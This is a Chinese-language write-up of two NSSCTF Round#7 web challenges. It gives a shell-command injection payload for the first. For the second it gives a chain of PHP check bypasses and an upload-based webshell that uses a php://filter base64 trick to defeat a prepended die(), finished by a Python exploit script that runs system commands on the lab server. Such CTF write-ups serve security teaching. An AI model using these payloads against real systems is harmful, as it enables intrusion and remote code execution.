NSSCTF Round#7 Team ez_rce和0o0讲解

强烈建议NSSCTF延长时间,大过年的逛亲戚回来就剩两个小时了。。。。

ez_rce

<!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHP
    
    if(!isset($_POST["action"]) && !isset($_POST["data"]))
        show_source(__FILE__);

    putenv('LANG=zh_TW.utf8'); 

    $action = $_POST["action"];
    $data = "'".$_POST["data"]."'";

    $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
    echo $output;    
?>

刚看到差点被这个被这个吓到,还以为第一题就是java安全,仔细一看就是运行了一个jar文件,然后我们可以自定义action和data的值,这里就可以用到||这个了,||旁边两个都可以执行的,最后闭合一下单引号就可以了。

post传:action=||&data='cat /flag'

0o0

这里没有发现什么有用的东西,我们去扫一扫目录看看,然后我们就发现了,一个关键的文件,.D

 

//我们直接使用wget下载过来
wget http://43.143.7.97:28537/.DS_Store

vim -r尝试恢复一下,但是没有成功,接下来就直接看看里面的内容,有没有什么信息。

 

这里我们看到了一个文件,我们尝试访问一下。

//Ns_SCtF.php
<?php
error_reporting(0);
highlight_file(__FILE__);

$NSSCTF = $_GET['NSSCTF'] ?: '';
$NsSCTF = $_GET['NsSCTF'] ?: '';
$NsScTF = $_GET['NsScTF'] ?: '';
$NsScTf = $_GET['NsScTf'] ?: '';
$NSScTf = $_GET['NSScTf'] ?: '';
$nSScTF = $_GET['nSScTF'] ?: '';
$nSscTF = $_GET['nSscTF'] ?: '';

if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF)) {
    if (!is_numeric($NsScTF) && in_array($NsScTF, array(1))) {
        if (file_get_contents($NsScTf) === "Welcome to Round7!!!") {
            if (isset($_GET['nss_ctfer.vip'])) {
                if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514) {
                    $nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";
                    if ($nss && $nSscTF === "NSSRound7") {
                        if (isset($_POST['submit'])) {
                            $file_name = urldecode($_FILES['file']['name']);
                            $path = $_FILES['file']['tmp_name'];
                            if(strpos($file_name, ".png") == false){
                                die("NoO0P00oO0! Png! pNg! pnG!");
                            }
                            $content = file_get_contents($path);
                            $real_content = '<?php die("Round7 do you like");'. $content . '?>';
                            $real_name = fopen($file_name, "w");
                            fwrite($real_name, $real_content);
                            fclose($real_name);
                            echo "OoO0o0hhh.";
                        } else {
                            die("NoO0oO0oO0!");
                        }
                    } else {
                        die("N0o0o0oO0o!");
                    }
                } else {
                    die("NoOo00O0o0!");
                }
            } else {
                die("Noo0oO0oOo!");
            }
        } else {
            die("NO0o0oO0oO!");
        }
    } else {
        die("No0o0o000O!");
    }
} else {
    die("NO0o0o0o0o!");
} NO0o0o0o0o!

 我们拆开来一个一个分析。

if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF)) 

这里我们可以通过数组绕过

payload:?NSSCTF[]=1&NsSCTF[]=2

if (!is_numeric($NsScTF) && in_array($NsScTF, array(1)))

这里is_numeric是检测我们传入的东西是不是另一个数字或者一个数字字符串,因为有!,所以我们传入的东西不能是数字,但是后面in_array是查询我们传入的值有没有在数组中,他的数组中只有一个1,所以我们需要传入一个1

这里我们可以使用%00截断

payload: &NsScTF=1%00

if (file_get_contents($NsScTf) === "Welcome to Round7!!!")
file_get_contents是可以读取文件内容的,这里我们可以利用data伪协议

 payload:&NsScTf=data://text/plain,Welcome to Round7!!!

if (isset($_GET['nss_ctfer.vip']))

这里有特殊字符,_这个十分重要,我们假如按正常的参数输入,他是不会接收的,我们要使用[代替_。

payload:&nss[ctfer.vip=true

if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514)

这里不能等于114514,但是经过intval函数要等于114514,这里base参数设置的就是0他会根据我们传入的值判断要转换的整数。

这里我们可以通过科学计数法绕过

payload:&NSScTf=114514e1

$nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";
if ($nss && $nSscTF === "NSSRound7")
这里还是is_numeric函数,分析下来nSScTF只要传递一个数字就可以了,然后就是nSscTF其实就是直接传NSSRound7就可以了

payload:&nSScTF=1&nSscTF=NSSRound7

//完整
Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome to Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7
if (isset($_POST['submit'])) {
   $file_name = urldecode($_FILES['file']['name']);
   $path = $_FILES['file']['tmp_name'];
   if(strpos($file_name, ".png") == false){
       die("NoO0P00oO0! Png! pNg! pnG!");
   }
   $content = file_get_contents($path);
   $real_content = '<?php die("Round7 do you like");'. $content . '?>';
   $real_name = fopen($file_name, "w");
   fwrite($real_name, $real_content);
   fclose($real_name);
   echo "OoO0o0hhh.";
} else {
   die("NoO0oO0oO0!");

这里分析一下我们先post给subimt随便输入一个值就可以了,然后就是他会进入判断中,然后就是通过file参数来文件上传,这里还会进行一次url解密,然后他还会生成一个临时文件,然后就是strpos函数,让文件名中必须有.png,然后就会读取临时文件赋值给content,然后和die组成一个新的php代码,然后在当前目录中生成一个和我们上传的文件,一样名字的文件,然后将那一串代码写进去。

关于strpos哪里我们可以使用1.png.php来让文件进行php操作。

然后我们就需要绕过die函数,这里和绕过死亡exit很像,这里给大家探姬写的文章,感觉写的很厉害。

tj的文章

这里的意思很简单,我们把一串base64写入那里,然后使用伪协议将他进行一次解码,从而使die没了,当然不止可以使用base64还有很多方法,这里还可以参考这里死亡exit

//<?php system('echo 1');?> base64编码
PD9waHAgc3lzdGVtKCdlY2hvIDEnKTs/Pg==

//我们将上面那一串当做文件内容上传,这时候生成的文件的内容
//注意这里我们要补3个字母
<?php die("Round7 do you like");aaaPD9waHAgc3lzdGVtKCdlY2hvIDEnKTs/Pg==?>

这里解码我们发现前面就成了乱码,这里就可以解析我们上传的内容了。

 但是怎么才能让他解码,这里我们可以使用php://filter/convert.base64-decode/resource=1.png.php,记得上面有一次url解码,所以我们要进行加密一次

import requests
from base64 import b64encode
import re

def get_flag(URL):
    url = f"{URL}/Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome%20to%20Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7"
    data = {'submit':1}

    payload = str(b64encode(b"<?php system('cat /home/f1ag');?>")) #修改为自己想要执行的命令
    payload = re.findall(r"b'(.*?)'",payload)[0]

    file1 = {'file': ('1.png.php', f"aaa{payload}")}
    file2 = {'file': ('%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70', f"aaa{payload}")}

    requests.post(url,data=data,files=file1)
    requests.post(url,files=file2,data=data)
    nssctf_text3 = requests.post(f'{URL}/1.png.php').text
    print(nssctf_text3)

if __name__ == "__main__":
    get_flag("http://43.143.7.127:28479")